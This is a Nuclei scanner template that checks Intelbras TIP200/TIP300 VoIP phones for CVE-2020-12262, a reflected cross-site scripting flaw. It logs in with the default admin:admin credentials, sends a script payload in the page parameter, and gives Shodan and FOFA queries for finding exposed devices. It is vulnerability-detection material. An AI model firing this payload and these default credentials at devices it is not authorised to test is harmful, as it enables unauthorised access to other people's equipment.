id: CVE-2020-12262

info:
  name: Intelbras TIP200/TIP200LITE/TIP300 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Intelbras TIP200 60.61.75.15, TIP200LITE 60.61.75.15, and TIP300 65.61.75.15 are vulnerable to reflected cross-site scripting (XSS) via the page parameter in /cgi-bin/cgiServer.exx, allowing attackers to execute arbitrary JavaScript in the context of the user.
  remediation: |
    Update the device firmware to the latest version provided by Intelbras.
  reference:
    - https://lucxs.medium.com/cve-2020-12262-xss-voip-intelbras-d5697e31fbf6
    - https://www.youtube.com/watch?v=rihboOgiJRs
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12262
  classification:
    cve-id: CVE-2020-12262
    cwe-id: CWE-79
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
  metadata:
    max-request: 1
    product: tip300
    vendor: intelbras
    shodan-query: title:"Intelbras"
    fofa-query: title="Intelbras"
  tags: cve,cve2020,intelbras,tip200,tip200lite,tip300,xss,authenticated

variables:
  username: "admin"
  password: "admin"

http:
  - raw:
      - |
        GET /cgi-bin/cgiServer.exx?page=<script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}

    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "File not found"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022046f940b862d9998bc6e7fc77ae805a17b92a8aaddc7c2e23eadebc40a70dbb24022100d6b253d7f466dc4f2e2bd9bc32a802d8e8274ef6523f541351a86e8878cba0e6:922c64590222798bb761d5b6d8e72950